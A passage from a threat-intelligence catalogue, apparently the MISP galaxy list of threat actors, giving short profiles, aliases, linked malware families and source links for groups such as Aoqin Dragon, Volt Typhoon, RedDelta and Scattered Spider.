actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.

The tag is: misp-galaxy:threat-actor="Red Dev 17"

Table 12144. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

Aoqin Dragon

SentinelLabs has uncovered a cluster of activity beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. They assess that the threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. They track this activity as 'Aoqin Dragon'. The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors: Mongall, or a modified version of the open source Heyoka project.

The tag is: misp-galaxy:threat-actor="Aoqin Dragon"

Aoqin Dragon is also known as:

  • UNC94

Table 12145. Table References

Links

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

https://khonggianmang.vn/uploads/CB_941_Canhbao_APT_36c5a857fa.pdf

DangerousSavanna

A malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents to ISO, LNK, JAR and VBE files in various combinations. The threat actor’s evolving infection chains reflect the changes in the threat landscape seen over the past few years, as infection vectors have become more and more sophisticated and diverse.

The tag is: misp-galaxy:threat-actor="DangerousSavanna"

Table 12146. Table References

Links

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

Hezb

Hezb is a group that deploys cryptominers whenever new exploits become available for public-facing vulnerabilities. The name comes from the miner process they deploy.

The tag is: misp-galaxy:threat-actor="Hezb"

Hezb is also known as:

  • Mimo

Table 12147. Table References

Links

https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/

https://asec.ahnlab.com/en/60440/

NoName057(16)

NoName057(16) performs DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more, in Ukraine and in neighboring countries supporting Ukraine, such as Estonia, Lithuania, Norway, and Poland.

The tag is: misp-galaxy:threat-actor="NoName057(16)"

NoName057(16) is also known as:

  • NoName057

  • NoName05716

  • 05716nnm

  • Nnm05716

Table 12148. Table References

Links

https://decoded.avast.io/martinchlumecky/bobik/

https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/

https://www.gov.pl/web/special-services/russian-cyberattacks

BITWISE SPIDER

BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Since July 2021, their dedicated leak site (DLS) has posted more victims per month than any other adversary DLS, owing to the growing popularity and effectiveness of LockBit 2.0.

The tag is: misp-galaxy:threat-actor="BITWISE SPIDER"

BITWISE SPIDER has relationships with:

  • uses: misp-galaxy:ransomware="LockBit" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LockBit (Windows)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LockBit (ELF)" with estimative-language:likelihood-probability="likely"

Table 12149. Table References

Links

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

https://security.packt.com/understanding-lockbit/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

Void Balaur

Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.

The tag is: misp-galaxy:threat-actor="Void Balaur"

Table 12150. Table References

Links

https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/

https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/

https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf

https://www.amnesty.org/en/latest/research/2020/03/targeted-surveillance-attacks-in-uzbekistan-an-old-threat-with-new-techniques/

https://equalit.ie/deflect-labs-report-6/

APT-C-60

APT-C-60

The tag is: misp-galaxy:threat-actor="APT-C-60"

APT-C-60 is also known as:

  • APT-Q-12

Table 12151. Table References

Links

https://mp.weixin.qq.com/s/Hzq4_tWmunDpKfHTlZNM-A

https://cert.360.cn/report/detail?id=6c9a1b56e4ceb84a8ab9e96044429adc

RomCom

ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group’s adaptability and growing sophistication.

The tag is: misp-galaxy:threat-actor="RomCom"

RomCom is also known as:

  • Storm-0978

Table 12152. Table References

Links

https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass

https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries

https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html

https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/

https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection

https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

GOLD PRELUDE

GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.

The tag is: misp-galaxy:threat-actor="GOLD PRELUDE"

GOLD PRELUDE is also known as:

  • TA569

  • UNC1543

GOLD PRELUDE has relationships with:

  • uses: misp-galaxy:tool="FakeUpdates" with estimative-language:likelihood-probability="likely"

Table 12153. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-prelude

BazarCall

BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams, where potential victims are cold-called by the attacker, except that in BazarCall’s case the targeted users must dial the number themselves. When they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware onto their devices.

The tag is: misp-galaxy:threat-actor="BazarCall"

BazarCall is also known as:

  • BazzarCall

  • BazaCall

Table 12154. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

Evasive Panda

Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.

The tag is: misp-galaxy:threat-actor="Evasive Panda"

Evasive Panda is also known as:

  • BRONZE HIGHLAND

Table 12155. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/

https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf

https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack

TAG-53

A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.

The tag is: misp-galaxy:threat-actor="TAG-53"

TAG-53 has relationships with:

  • overlaps: misp-galaxy:threat-actor="Callisto" with estimative-language:likelihood-probability="likely"

Table 12156. Table References

Links

https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies

https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations

https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf

Malteiro

This group of cybercriminals, named Malteiro by SCILabs, operates and distributes the URSA/Mispadu banking trojan.

The tag is: misp-galaxy:threat-actor="Malteiro"

Malteiro has relationships with:

  • delivers: misp-galaxy:banker="Malteiro" with estimative-language:likelihood-probability="likely"

Table 12157. Table References

Links

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

https://blog.scilabs.mx/cyber-threat-profile-malteiro/

Moskalvzapoe

The tag is: misp-galaxy:threat-actor="Moskalvzapoe"

Moskalvzapoe is also known as:

  • MAN1

  • TA511

Moskalvzapoe has relationships with:

  • uses: misp-galaxy:malpedia="Hancitor" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="Hancitor - S0499" with estimative-language:likelihood-probability="very-likely"

Table 12158. Table References

Links

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://vixra.org/abs/1902.0257

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://unit42.paloaltonetworks.com/threat-brief-hancitor-actors/

TA570

Proofpoint has tracked TA570, a large cybercrime threat actor and one of the most active Qbot malware affiliates, since 2018.

The tag is: misp-galaxy:threat-actor="TA570"

TA570 is also known as:

  • DEV-0450

TA570 has relationships with:

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="very-likely"

Table 12159. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://therecord.media/hackers-using-follina-windows-zero-day-to-spread-qbot-malware/

https://isc.sans.edu/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

TA575

TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.

The tag is: misp-galaxy:threat-actor="TA575"

TA575 has relationships with:

  • uses: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="Dridex - S0384" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="WastedLocker" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="WastedLocker - S0612" with estimative-language:likelihood-probability="very-likely"

Table 12160. Table References

Links

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware

https://www.zdnet.com/article/ta575-criminal-group-using-squid-game-lures-for-dridex-malware/

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

TA577

TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.

The tag is: misp-galaxy:threat-actor="TA577"

TA577 is also known as:

  • Hive0118

TA577 has relationships with:

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="SystemBC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 12161. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html

https://www.itpro.com/security/ransomware/359919/ransomware-criminals-look-to-other-hackers-to-provide-them-with-network

https://exchange.xforce.ibmcloud.com/threat-group/guid:1dda890fa2662ed26b451c703e922315

TA2536

TA2536, which has been active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics and tools. It uses keyloggers such as HawkEye and shows distinctive stylometric features: typo-squatted domains that resemble legitimate names, and recurring names and substrings in its email addresses.

The tag is: misp-galaxy:threat-actor="TA2536"

TA2536 has relationships with:

  • uses: misp-galaxy:malpedia="Nanocore RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Agent Tesla" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Remcos" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LokiBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Formbook" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 12162. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1

DEV-0147

DEV-0147, a China-based cyber espionage actor, was observed compromising diplomatic targets in South America, a notable expansion of the group’s data exfiltration operations, which traditionally targeted government agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools like ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147’s attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for reconnaissance and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.

The tag is: misp-galaxy:threat-actor="DEV-0147"

Table 12163. Table References

Links

https://twitter.com/MsftSecIntel/status/1625181255754039318

TA406

TA406 is engaging in malware distribution, phishing, intelligence collection, and cryptocurrency theft, resulting in a wide range of criminal activities.

The tag is: misp-galaxy:threat-actor="TA406"

TA406 has relationships with:

  • part-of: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 12164. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals

APT42

APT42 is an Iranian state-sponsored cyber espionage group tasked with conducting information collection and surveillance operations against individuals and organizations of strategic interest to the Iranian government.

The tag is: misp-galaxy:threat-actor="APT42"

APT42 is also known as:

  • UNC788

  • CALANQUE

APT42 has relationships with:

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

Table 12165. Table References

Links

https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

TA453

TA453 has employed the use of compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds from medical researchers to realtors to travel agencies.

The tag is: misp-galaxy:threat-actor="TA453"

TA453 has relationships with:

  • similar: misp-galaxy:threat-actor="APT42" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

Table 12166. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

Chamelgang

In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company’s network had been compromised by an unknown group for the purpose of data theft. They gave the group the name ChamelGang (from the word "chameleon"), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.

The tag is: misp-galaxy:threat-actor="Chamelgang"

Chamelgang has relationships with:

  • uses: misp-galaxy:malpedia="DoorMe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 12167. Table References

Links

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/

Karakurt

Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.

The tag is: misp-galaxy:threat-actor="Karakurt"

Karakurt is also known as:

  • Karakurt Lair

Karakurt has relationships with:

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="AnyDesk" with estimative-language:likelihood-probability="likely"

Table 12168. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation

DEV-0270

Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.

The tag is: misp-galaxy:threat-actor="DEV-0270"

DEV-0270 is also known as:

  • Nemesis Kitten

  • Storm-0270

DEV-0270 has relationships with:

  • part-of: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

Table 12169. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

Prophet Spider

PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.

The tag is: misp-galaxy:threat-actor="Prophet Spider"

Prophet Spider is also known as:

  • GOLD MELODY

  • UNC961

Prophet Spider has relationships with:

  • uses: misp-galaxy:malpedia="Egregor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Mount Locker" with estimative-language:likelihood-probability="likely"

Table 12170. Table References

Links

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/

https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

TA866

According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email utilizing both commodity and custom tools. While most of the activity observed occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests that recent campaigns are financially motivated; however, assessment of historic related activity suggests a possible additional espionage objective.

The tag is: misp-galaxy:threat-actor="TA866"

TA866 has relationships with:

  • uses: misp-galaxy:tool="WasabiSeed" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Screenshotter" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:stealer="Rhadamanthys" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="AHK Bot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tds="404 TDS" with estimative-language:likelihood-probability="likely"

Table 12171. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Anonymous Sudan

Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting distributed denial of service (DDoS) attacks against multiple organizations in Sweden. This group claims to be "hacktivists," politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.

The tag is: misp-galaxy:threat-actor="Anonymous Sudan"

Table 12172. Table References

Links

https://files.truesec.com/hubfs/Reports/Anonymous%20Sudan%20-%20Publish%201.2%20-%20a%20Truesec%20Report.pdf

https://www.truesec.com/hub/blog/what-is-anonymous-sudan

RedGolf

Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.

The tag is: misp-galaxy:threat-actor="RedGolf"

RedGolf has relationships with:

  • overlaps: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="KEYPLUG" with estimative-language:likelihood-probability="likely"

Table 12173. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer

APT43

  • APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues.

  • In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence.

  • The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure.

  • APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.

The tag is: misp-galaxy:threat-actor="APT43"

Table 12174. Table References

Links

https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Hagga

Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.

The tag is: misp-galaxy:threat-actor="Hagga"

Hagga is also known as:

  • Aggah

  • TH-157

Hagga has relationships with:

  • uses: misp-galaxy:tool="Agent Tesla" with estimative-language:likelihood-probability="likely"

Table 12175. Table References

Links

https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

https://otx.alienvault.com/pulse/62cfe4ef3415be5f83be81d1

https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor/

https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

Volt Typhoon

[Microsoft] Volt Typhoon, a state-sponsored actor based in China that typically focuses on espionage and information gathering. Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.

[Secureworks] BRONZE SILHOUETTE likely operates on behalf of the PRC. The targeting of U.S. government and defense organizations for intelligence gain aligns with PRC requirements, and the tradecraft observed in these engagements overlaps with that of other state-sponsored Chinese threat groups.

The tag is: misp-galaxy:threat-actor="Volt Typhoon"

Volt Typhoon is also known as:

  • BRONZE SILHOUETTE

Table 12176. Table References

Links

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

SmugX

The campaign, called SmugX, overlaps with previously reported activity by Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.

The campaign uses new delivery methods (most notably HTML Smuggling) to deploy a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar.

The tag is: misp-galaxy:threat-actor="SmugX"

Table 12177. Table References

Links

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

RedDelta

RedDelta is a likely Chinese state-sponsored threat activity group targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident through the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as throughout 2022 through the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine.

During the 3-month period from September through November 2022, RedDelta has regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure.

RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.

The tag is: misp-galaxy:threat-actor="RedDelta"

RedDelta has relationships with:

  • overlaps: misp-galaxy:threat-actor="MUSTANG PANDA" with estimative-language:likelihood-probability="likely"

  • overlaps: misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129" with estimative-language:likelihood-probability="likely"

Table 12178. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf

Worok

Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.

The tag is: misp-galaxy:threat-actor="Worok"

Table 12179. Table References

Links

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

MoustachedBouncer

MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in August 2023. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. The group uses two separate toolsets that we have named NightClub and Disco.

The tag is: misp-galaxy:threat-actor="MoustachedBouncer"

Table 12180. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Storm-0324

The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.

The tag is: misp-galaxy:threat-actor="Storm-0324"

Storm-0324 is also known as:

  • DEV-0324

  • Sagrid

  • TA543

Storm-0324 has relationships with:

  • uses: misp-galaxy:malpedia="JSSLoader" with estimative-language:likelihood-probability="likely"

Table 12181. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/

https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded

Scattered Canary

When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.

The tag is: misp-galaxy:threat-actor="Scattered Canary"

Table 12182. Table References

Links

https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/

https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf

https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20

Scattered Spider

Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.

The tag is: misp-galaxy:threat-actor="Scattered Spider"

Scattered Spider is also known as:

  • UNC3944

  • Muddled Libra

  • Oktapus

  • Scattered Swine

  • Scatter Swine

  • Octo Tempest

  • 0ktapus

  • Storm-0971

  • DEV-0971

Table 12183. Table References

Links

https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/

